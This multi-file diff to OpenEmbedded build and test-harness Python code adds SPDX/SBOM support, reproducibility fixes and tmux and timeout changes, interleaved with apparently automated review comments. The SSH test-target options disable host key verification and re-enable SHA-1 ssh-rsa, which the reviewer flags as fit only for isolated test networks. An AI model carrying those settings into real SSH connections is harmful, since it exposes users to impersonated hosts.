diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
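--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
  ret[newvar] = subd[var]
  return ret
 
+def read_subpkgdata_extended(pkg, d):
+ import json
+ import gzip
+
+ fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
+ try:
+ with gzip.open(fn, "rt", encoding="utf-8") as f:
+ return json.load(f)
+ except FileNotFoundError:
+ return None
+
 def _pkgmap(d):
  """Return a dictionary mapping package to recipe name."""
 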
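Review bot: `read_subpkgdata_extended` has no docstring, unlike `_pkgmap` directly below it, and its `None` return for a missing file is easy to overlook at call sites. A one-line docstring would state the contract: `"""Return the parsed extended pkgdata JSON for pkg, or None if the file does not exist."""`. Only FileNotFoundError is handled, so a truncated or corrupt `.json.gz` propagates as an exception from `gzip` or `json`; if that is intended, the docstring should say so.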
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7cd8436da5..feb6ee7082 100644
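--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
 # SPDX-License-Identifier: GPL-2.0-only
 #
 
+import os
+import shlex
+import subprocess
 import oe.path
 import oe.types
 
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
 
 
 def runcmd(args, dir = None):
- import pipes
  import subprocess
 
  if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
  # print("cwd: %s -> %s" % (olddir, dir))
 
  try:
- args = [ pipes.quote(str(arg)) for arg in args ]
+ args = [ shlex.quote(str(arg)) for arg in args ]
  cmd = " ".join(args)
  # print("cmd: %s" % cmd)
  (exitstatus, output) = subprocess.getstatusoutput(cmd)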
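Review bot: The function-level `import subprocess` kept inside `runcmd` is now redundant, because this commit adds `import subprocess` at module level; it can be dropped along with the removed `import pipes`. Since `subprocess.getstatusoutput(cmd)` runs the joined string through a shell, the quoting line is what keeps arguments from being re-split, and a short comment above it would record that: `# every arg is shell-quoted because getstatusoutput() runs cmd via the shell`. The body of `runcmd` continues outside these hunks.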
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 0fb02ccdb0..1ed79b18ca 100644
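--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,7 +41,7 @@ def find_git_folder(d, sourcedir):
  for root, dirs, files in os.walk(workdir, topdown=True):
  dirs[:] = [d for d in dirs if d not in exclude]
  if '.git' in dirs:
- return root
+ return os.path.join(root, ".git")
 
  bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
  return None
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
  return None
 
  bb.debug(1, "git repository: %s" % gitpath)
- p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE)
+ p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
+ check=True, stdout=subprocess.PIPE)
  return int(p.stdout.decode('utf-8'))
 
 def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
  bb.debug(1, "Newest file found: %s" % newest_file)
  return source_date_epoch
 
-def fixed_source_date_epoch():
+def fixed_source_date_epoch(d):
  bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
+ source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
+ if source_date_epoch:
+ bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
+ return int(source_date_epoch)
  return 0
 
 def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
  get_source_date_epoch_from_git(d, sourcedir) or
  get_source_date_epoch_from_known_files(d, sourcedir) or
  get_source_date_epoch_from_youngest_file(d, sourcedir) or
- fixed_source_date_epoch() # Last resort
+ fixed_source_date_epoch(d) # Last resort
  )
 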
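Review bot: `fixed_source_date_epoch(d)` passes `SOURCE_DATE_EPOCH_FALLBACK` straight to `int()`, so a non-numeric setting surfaces as a bare ValueError that does not name the variable at fault. Catching it and reporting the variable makes the failure actionable, e.g. wrap the return in `try:` and add `except ValueError: bb.fatal("SOURCE_DATE_EPOCH_FALLBACK must be an integer, got %r" % source_date_epoch)`. The function would also benefit from a docstring saying it returns the configured fallback when set and 0 otherwise, since that value ends up as the timestamp of last resort for the build.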
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
167 pass 167 pass
168 os.rename(self.image_rootfs, self.image_rootfs + '-dbg') 168 os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
169 169
170 bb.note(" Restoreing original rootfs...") 170 bb.note(" Restoring original rootfs...")
171 os.rename(self.image_rootfs + '-orig', self.image_rootfs) 171 os.rename(self.image_rootfs + '-orig', self.image_rootfs)
172 172
173 def _exec_shell_cmd(self, cmd): 173 def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
304 def _check_for_kernel_modules(self, modules_dir): 304 def _check_for_kernel_modules(self, modules_dir):
305 for root, dirs, files in os.walk(modules_dir, topdown=True): 305 for root, dirs, files in os.walk(modules_dir, topdown=True):
306 for name in files: 306 for name in files:
307 found_ko = name.endswith(".ko") 307 found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
308 if found_ko: 308 if found_ko:
309 return found_ko 309 return found_ko
310 return False 310 return False
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
321 if not os.path.exists(kernel_abi_ver_file): 321 if not os.path.exists(kernel_abi_ver_file):
322 bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file) 322 bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
323 323
324 kernel_ver = open(kernel_abi_ver_file).read().strip(' \n') 324 with open(kernel_abi_ver_file) as f:
325 kernel_ver = f.read().strip(' \n')
326
325 versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver) 327 versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
326 328
327 bb.utils.mkdirhier(versioned_modules_dir) 329 bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
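--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import collections
+
+DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
+DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
+
+
+def get_recipe_spdxid(d):
+ return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
+
+
+def get_download_spdxid(d, idx):
+ return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_package_spdxid(pkg):
+ return "SPDXRef-Package-%s" % pkg
+
+
+def get_source_file_spdxid(d, idx):
+ return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_packaged_file_spdxid(pkg, idx):
+ return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
+
+
+def get_image_spdxid(img):
+ return "SPDXRef-Image-%s" % img
+
+
+def get_sdk_spdxid(sdk):
+ return "SPDXRef-SDK-%s" % sdk
+
+
+def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
+ from pathlib import Path
+
+ if spdx_deploy is None:
+ spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
+
+ dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
+ dest.parent.mkdir(exist_ok=True, parents=True)
+ with dest.open("wb") as f:
+ doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
+
+ l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
+ l.parent.mkdir(exist_ok=True, parents=True)
+ l.symlink_to(os.path.relpath(dest, l.parent))
+
+ return doc_sha1
+
+
+def read_doc(fn):
+ import hashlib
+ import oe.spdx
+ import io
+ import contextlib
+
+ @contextlib.contextmanager
+ def get_file():
+ if isinstance(fn, io.IOBase):
+ yield fn
+ else:
+ with fn.open("rb") as f:
+ yield f
+
+ with get_file() as f:
+ sha1 = hashlib.sha1()
+ while True:
+ chunk = f.read(4096)
+ if not chunk:
+ break
+ sha1.update(chunk)
+
+ f.seek(0)
+ doc = oe.spdx.SPDXDocument.from_json(f)
+
+ return (doc, sha1.hexdigest())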
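Review bot: `write_doc` calls `os.path.relpath(...)`, but the only module-level import in this new file is `collections`, so unless `os` is injected into builtins by the build environment (not visible here) the call raises NameError; adding `import os` next to `import collections` makes the module self-contained. In the same function, `l.symlink_to(...)` raises FileExistsError when a by-namespace link is left over from an earlier run, so the write is not repeatable as written. The link name is built from `spdx_doc.documentNamespace` with only `/` replaced, and `subdir` and `spdx_doc.name` go into the destination path unchecked; a comment stating that these values come from the build's own metadata would make that trust assumption explicit.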
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6
7#
8# This library is intended to capture the JSON SPDX specification in a type
9# safe manner. It is not intended to encode any particular OE specific
10# behaviors, see the sbom.py for that.
11#
12# The documented SPDX spec document doesn't cover the JSON syntax for
13# particular configuration, which can make it hard to determine what the JSON
14# syntax should be. I've found it is actually much simpler to read the official
15# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
16# in schemas/spdx-schema.json
17#
18
19import hashlib
20import itertools
21import json
22
23SPDX_VERSION = "2.2"
24
25
26#
27# The following are the support classes that are used to implement SPDX object
28#
29
30class _Property(object):
31 """
32 A generic SPDX object property. The different types will derive from this
33 class
34 """
35
36 def __init__(self, *, default=None):
37 self.default = default
38
39 def setdefault(self, dest, name):
40 if self.default is not None:
41 dest.setdefault(name, self.default)
42
43
44class _String(_Property):
45 """
46 A scalar string property for an SPDX object
47 """
48
49 def __init__(self, **kwargs):
50 super().__init__(**kwargs)
51
52 def set_property(self, attrs, name):
53 def get_helper(obj):
54 return obj._spdx[name]
55
56 def set_helper(obj, value):
57 obj._spdx[name] = value
58
59 def del_helper(obj):
60 del obj._spdx[name]
61
62 attrs[name] = property(get_helper, set_helper, del_helper)
63
64 def init(self, source):
65 return source
66
67
68class _Object(_Property):
69 """
70 A scalar SPDX object property of a SPDX object
71 """
72
73 def __init__(self, cls, **kwargs):
74 super().__init__(**kwargs)
75 self.cls = cls
76
77 def set_property(self, attrs, name):
78 def get_helper(obj):
79 if not name in obj._spdx:
80 obj._spdx[name] = self.cls()
81 return obj._spdx[name]
82
83 def set_helper(obj, value):
84 obj._spdx[name] = value
85
86 def del_helper(obj):
87 del obj._spdx[name]
88
89 attrs[name] = property(get_helper, set_helper)
90
91 def init(self, source):
92 return self.cls(**source)
93
94
95class _ListProperty(_Property):
96 """
97 A list of SPDX properties
98 """
99
100 def __init__(self, prop, **kwargs):
101 super().__init__(**kwargs)
102 self.prop = prop
103
104 def set_property(self, attrs, name):
105 def get_helper(obj):
106 if not name in obj._spdx:
107 obj._spdx[name] = []
108 return obj._spdx[name]
109
110 def set_helper(obj, value):
111 obj._spdx[name] = list(value)
112
113 def del_helper(obj):
114 del obj._spdx[name]
115
116 attrs[name] = property(get_helper, set_helper, del_helper)
117
118 def init(self, source):
119 return [self.prop.init(o) for o in source]
120
121
122class _StringList(_ListProperty):
123 """
124 A list of strings as a property for an SPDX object
125 """
126
127 def __init__(self, **kwargs):
128 super().__init__(_String(), **kwargs)
129
130
131class _ObjectList(_ListProperty):
132 """
133 A list of SPDX objects as a property for an SPDX object
134 """
135
136 def __init__(self, cls, **kwargs):
137 super().__init__(_Object(cls), **kwargs)
138
139
140class MetaSPDXObject(type):
141 """
142 A metaclass that allows properties (anything derived from a _Property
143 class) to be defined for a SPDX object
144 """
145 def __new__(mcls, name, bases, attrs):
146 attrs["_properties"] = {}
147
148 for key in attrs.keys():
149 if isinstance(attrs[key], _Property):
150 prop = attrs[key]
151 attrs["_properties"][key] = prop
152 prop.set_property(attrs, key)
153
154 return super().__new__(mcls, name, bases, attrs)
155
156
157class SPDXObject(metaclass=MetaSPDXObject):
158 """
159 The base SPDX object; all SPDX spec classes must derive from this class
160 """
161 def __init__(self, **d):
162 self._spdx = {}
163
164 for name, prop in self._properties.items():
165 prop.setdefault(self._spdx, name)
166 if name in d:
167 self._spdx[name] = prop.init(d[name])
168
169 def serializer(self):
170 return self._spdx
171
172 def __setattr__(self, name, value):
173 if name in self._properties or name == "_spdx":
174 super().__setattr__(name, value)
175 return
176 raise KeyError("%r is not a valid SPDX property" % name)
177
178#
179# These are the SPDX objects implemented from the spec. The *only* properties
180# that can be added to these objects are ones directly specified in the SPDX
181# spec, however you may add helper functions to make operations easier.
182#
183# Defaults should *only* be specified if the SPDX spec says there is a certain
184# required value for a field (e.g. dataLicense), or if the field is mandatory
185# and has some sane "this field is unknown" (e.g. "NOASSERTION")
186#
187
188class SPDXAnnotation(SPDXObject):
189 annotationDate = _String()
190 annotationType = _String()
191 annotator = _String()
192 comment = _String()
193
194class SPDXChecksum(SPDXObject):
195 algorithm = _String()
196 checksumValue = _String()
197
198
199class SPDXRelationship(SPDXObject):
200 spdxElementId = _String()
201 relatedSpdxElement = _String()
202 relationshipType = _String()
203 comment = _String()
204 annotations = _ObjectList(SPDXAnnotation)
205
206
207class SPDXExternalReference(SPDXObject):
208 referenceCategory = _String()
209 referenceType = _String()
210 referenceLocator = _String()
211
212
213class SPDXPackageVerificationCode(SPDXObject):
214 packageVerificationCodeValue = _String()
215 packageVerificationCodeExcludedFiles = _StringList()
216
217
218class SPDXPackage(SPDXObject):
219 ALLOWED_CHECKSUMS = [
220 "SHA1",
221 "SHA224",
222 "SHA256",
223 "SHA384",
224 "SHA512",
225 "MD2",
226 "MD4",
227 "MD5",
228 "MD6",
229 ]
230
231 name = _String()
232 SPDXID = _String()
233 versionInfo = _String()
234 downloadLocation = _String(default="NOASSERTION")
235 supplier = _String(default="NOASSERTION")
236 homepage = _String()
237 licenseConcluded = _String(default="NOASSERTION")
238 licenseDeclared = _String(default="NOASSERTION")
239 summary = _String()
240 description = _String()
241 sourceInfo = _String()
242 copyrightText = _String(default="NOASSERTION")
243 licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
244 externalRefs = _ObjectList(SPDXExternalReference)
245 packageVerificationCode = _Object(SPDXPackageVerificationCode)
246 hasFiles = _StringList()
247 packageFileName = _String()
248 annotations = _ObjectList(SPDXAnnotation)
249 checksums = _ObjectList(SPDXChecksum)
250
251
252class SPDXFile(SPDXObject):
253 SPDXID = _String()
254 fileName = _String()
255 licenseConcluded = _String(default="NOASSERTION")
256 copyrightText = _String(default="NOASSERTION")
257 licenseInfoInFiles = _StringList(default=["NOASSERTION"])
258 checksums = _ObjectList(SPDXChecksum)
259 fileTypes = _StringList()
260
261
262class SPDXCreationInfo(SPDXObject):
263 created = _String()
264 licenseListVersion = _String()
265 comment = _String()
266 creators = _StringList()
267
268
269class SPDXExternalDocumentRef(SPDXObject):
270 externalDocumentId = _String()
271 spdxDocument = _String()
272 checksum = _Object(SPDXChecksum)
273
274
275class SPDXExtractedLicensingInfo(SPDXObject):
276 name = _String()
277 comment = _String()
278 licenseId = _String()
279 extractedText = _String()
280
281
282class SPDXDocument(SPDXObject):
283 spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
284 dataLicense = _String(default="CC0-1.0")
285 SPDXID = _String(default="SPDXRef-DOCUMENT")
286 name = _String()
287 documentNamespace = _String()
288 creationInfo = _Object(SPDXCreationInfo)
289 packages = _ObjectList(SPDXPackage)
290 files = _ObjectList(SPDXFile)
291 relationships = _ObjectList(SPDXRelationship)
292 externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
293 hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
294
295 def __init__(self, **d):
296 super().__init__(**d)
297
298 def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
299 class Encoder(json.JSONEncoder):
300 def default(self, o):
301 if isinstance(o, SPDXObject):
302 return o.serializer()
303
304 return super().default(o)
305
306 sha1 = hashlib.sha1()
307 for chunk in Encoder(
308 sort_keys=sort_keys,
309 indent=indent,
310 separators=separators,
311 ).iterencode(self):
312 chunk = chunk.encode("utf-8")
313 f.write(chunk)
314 sha1.update(chunk)
315
316 return sha1.hexdigest()
317
318 @classmethod
319 def from_json(cls, f):
320 return cls(**json.load(f))
321
322 def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
323 if isinstance(_from, SPDXObject):
324 from_spdxid = _from.SPDXID
325 else:
326 from_spdxid = _from
327
328 if isinstance(_to, SPDXObject):
329 to_spdxid = _to.SPDXID
330 else:
331 to_spdxid = _to
332
333 r = SPDXRelationship(
334 spdxElementId=from_spdxid,
335 relatedSpdxElement=to_spdxid,
336 relationshipType=relationship,
337 )
338
339 if comment is not None:
340 r.comment = comment
341
342 if annotation is not None:
343 r.annotations.append(annotation)
344
345 self.relationships.append(r)
346
347 def find_by_spdxid(self, spdxid):
348 for o in itertools.chain(self.packages, self.files):
349 if o.SPDXID == spdxid:
350 return o
351 return None
352
353 def find_external_document_ref(self, namespace):
354 for r in self.externalDocumentRefs:
355 if r.spdxDocument == namespace:
356 return r
357 return None
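Review bot: `_Property.setdefault` stores `self.default` itself in each instance's `_spdx` dict, so the list defaults declared with `_StringList(default=["NOASSERTION"])` on `SPDXPackage.licenseInfoFromFiles` and `SPDXFile.licenseInfoInFiles` are one shared list object, and an append through one package or file changes the value seen by every other instance that still holds the default. Copying list defaults avoids that: `dest.setdefault(name, list(self.default) if isinstance(self.default, list) else self.default)`. `_Object.set_property` also defines `del_helper` but does not pass it to `property(...)`, unlike `_String` and `_ListProperty`. Finally, `SPDXObject.__init__` silently ignores keys that are not declared properties, so `from_json` accepts a document with unknown or misspelled fields without any signal; a docstring noting that would help anyone loading SPDX files produced elsewhere.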
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index aeceb100d7..65bb4efe25 100644
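--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -480,8 +480,10 @@ def OEOuthashBasic(path, sigfile, task, d):
  if "package_write_" in task or task == "package_qa":
  include_owners = False
  include_timestamps = False
+ include_root = True
  if task == "package":
  include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
+ include_root = False
  extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
 
  try:
@@ -592,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
  update_hash("\n")
 
  # Process this directory and all its child files
- process(root)
+ if include_root or root != ".":
+ process(root)
  for f in files:
  if f == 'fixmepath':
  continue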
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
102 command = 'rxvt -T "{title}" -e {command}' 102 command = 'rxvt -T "{title}" -e {command}'
103 priority = 1 103 priority = 1
104 104
105class URxvt(XTerminal):
106 command = 'urxvt -T "{title}" -e {command}'
107 priority = 1
108
105class Screen(Terminal): 109class Screen(Terminal):
106 command = 'screen -D -m -t "{title}" -S devshell {command}' 110 command = 'screen -D -m -t "{title}" -S devshell {command}'
107 111
@@ -163,7 +167,12 @@ class Tmux(Terminal):
163 # devshells, if it's already there, add a new window to it. 167 # devshells, if it's already there, add a new window to it.
164 window_name = 'devshell-%i' % os.getpid() 168 window_name = 'devshell-%i' % os.getpid()
165 169
166 self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name) 170 self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
171 if not check_tmux_version('1.9'):
172 # `tmux new-session -c` was added in 1.9;
173 # older versions fail with that flag
174 self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
175 self.command = self.command.format(window_name)
167 Terminal.__init__(self, sh_cmd, title, env, d) 176 Terminal.__init__(self, sh_cmd, title, env, d)
168 177
169 attach_cmd = 'tmux att -t {0}'.format(window_name) 178 attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
253 except OSError: 262 except OSError:
254 return 263 return
255 264
265def check_tmux_version(desired):
266 vernum = check_terminal_version("tmux")
267 if vernum and LooseVersion(vernum) < desired:
268 return False
269 return vernum
270
256def check_tmux_pane_size(tmux): 271def check_tmux_pane_size(tmux):
257 import subprocess as sub 272 import subprocess as sub
258 # On older tmux versions (<1.9), return false. The reason 273 # On older tmux versions (<1.9), return false. The reason
259 # is that there is no easy way to get the height of the active panel 274 # is that there is no easy way to get the height of the active panel
260 # on current window without nested formats (available from version 1.9) 275 # on current window without nested formats (available from version 1.9)
261 vernum = check_terminal_version("tmux") 276 if not check_tmux_version('1.9'):
262 if vernum and LooseVersion(vernum) < '1.9':
263 return False 277 return False
264 try: 278 try:
265 p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux, 279 p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
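Review bot: `check_tmux_version()` returns either `False` or whatever `check_terminal_version("tmux")` returned, and both callers test it with `not`, so a version that could not be determined (assuming that helper returns a falsy value then; it is not visible here) is now handled like a version older than 1.9. In `check_tmux_pane_size()` that differs from the removed lines, where an unknown version fell through to the `list-panes` call. If the change is not intended, end the helper with `return True` instead of `return vernum`. Either way, give it a one-line docstring stating what it returns and how an undetermined version is treated. `check_tmux_pane_size` continues past the end of the hunk.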
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 83d298906b..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
481 try: 481 try:
482 func(self, *args, **kargs) 482 func(self, *args, **kargs)
483 except Exception as e: 483 except Exception as e:
484 print(e) 484 # Eat all exceptions
485 bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
485 finally: 486 finally:
486 self.tasks.task_done() 487 self.tasks.task_done()
487 488
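Review bot: Logging the swallowed exception only at debug level means a worker task that fails leaves no trace in a default-verbosity run, while `task_done()` is still called as if the work had completed. If the functions queued on `ThreadedWorker` produce build outputs, a silent failure can yield incomplete results that look clean. Consider `bb.mainlogger.warning("Worker task raised %s" % e, exc_info=e)`, or record the exception on the worker so the pool can report it. The comment `# Eat all exceptions` should also say why swallowing is safe here. The enclosing method starts outside the hunk.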
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
43 clss.tearDownClassMethod() 43 clss.tearDownClassMethod()
44 44
45 def _oeSetUp(self): 45 def _oeSetUp(self):
46 for d in self.decorators: 46 try:
47 d.setUpDecorator() 47 for d in self.decorators:
48 d.setUpDecorator()
49 except:
50 for d in self.decorators:
51 d.tearDownDecorator()
52 raise
48 self.setUpMethod() 53 self.setUpMethod()
49 54
50 def _oeTearDown(self): 55 def _oeTearDown(self):
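Review bot: The new `except:` branch in `_oeSetUp` calls `tearDownDecorator()` on every decorator, including those whose `setUpDecorator()` never ran. If one of those teardown calls raises, the remaining decorators are not torn down and the original setup error is no longer the one reported first. The `hasattr(self, 'alarmSignal')` guard added to `OETimeout.tearDownDecorator` in this commit covers one decorator; the others are not visible here and would need the same tolerance. A comment such as `# tearDownDecorator() must be safe to call even if setUpDecorator() was not reached` would make the contract explicit. Wrapping each teardown call in its own `try`/`except Exception` that logs would keep the cleanup going.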
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
24 24
25 def tearDownDecorator(self): 25 def tearDownDecorator(self):
26 signal.alarm(0) 26 signal.alarm(0)
27 signal.signal(signal.SIGALRM, self.alarmSignal) 27 if hasattr(self, 'alarmSignal'):
28 self.logger.debug("Removed SIGALRM handler") 28 signal.signal(signal.SIGALRM, self.alarmSignal)
29 self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
34 self.timeout = timeout 34 self.timeout = timeout
35 self.user = user 35 self.user = user
36 ssh_options = [ 36 ssh_options = [
37 '-o', 'HostKeyAlgorithms=+ssh-rsa',
37 '-o', 'UserKnownHostsFile=/dev/null', 38 '-o', 'UserKnownHostsFile=/dev/null',
38 '-o', 'StrictHostKeyChecking=no', 39 '-o', 'StrictHostKeyChecking=no',
39 '-o', 'LogLevel=ERROR' 40 '-o', 'LogLevel=ERROR'
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
225 endtime = time.time() + timeout 226 endtime = time.time() + timeout
226 except InterruptedError: 227 except InterruptedError:
227 continue 228 continue
229 except BlockingIOError:
230 logger.debug('BlockingIOError')
231 continue
228 232
229 # process hasn't returned yet 233 # process hasn't returned yet
230 if not eof: 234 if not eof:
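Review bot: `'-o', 'HostKeyAlgorithms=+ssh-rsa'` re-enables the SHA-1 based `ssh-rsa` host key signature for every target, and it is added with no comment saying which targets need it. Together with the existing `UserKnownHostsFile=/dev/null` and `StrictHostKeyChecking=no`, the connection does not authenticate the host at all, which is only acceptable on an isolated test network. Say so above `ssh_options`, for example `# test targets only: host identity is not verified; ssh-rsa is accepted for targets that offer no other host key type`, if that is the reason. In the second hunk the `BlockingIOError` branch logs a fixed string; binding the exception and logging its text would make the debug line useful. Both enclosing functions extend beyond the hunks.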
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
8 8
9from oeqa.core.case import OETestCase 9from oeqa.core.case import OETestCase
10from oeqa.core.decorator.oetimeout import OETimeout 10from oeqa.core.decorator.oetimeout import OETimeout
11from oeqa.core.decorator.depends import OETestDepends
11 12
12class TimeoutTest(OETestCase): 13class TimeoutTest(OETestCase):
13 14
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
19 def testTimeoutFail(self): 20 def testTimeoutFail(self):
20 sleep(2) 21 sleep(2)
21 self.assertTrue(True, msg='How is this possible?') 22 self.assertTrue(True, msg='How is this possible?')
23
24
25 def testTimeoutSkip(self):
26 self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
27
28 @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
29 @OETimeout(3)
30 def testTimeoutDepends(self):
31 self.assertTrue(False, msg='How is this possible?')
32
33 def testTimeoutUnrelated(self):
34 sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
133 msg = "OETestTimeout didn't restore SIGALRM" 133 msg = "OETestTimeout didn't restore SIGALRM"
134 self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg) 134 self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
135 135
136 def test_timeout_cancel(self):
137 tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
138 msg = 'Unrelated test failed to complete'
139 tc = self._testLoader(modules=self.modules, tests=tests)
140 self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
141
136if __name__ == '__main__': 142if __name__ == '__main__':
137 unittest.main() 143 unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
44 "expected_results": "" 44 "expected_results": ""
45 }, 45 },
46 "2": { 46 "2": {
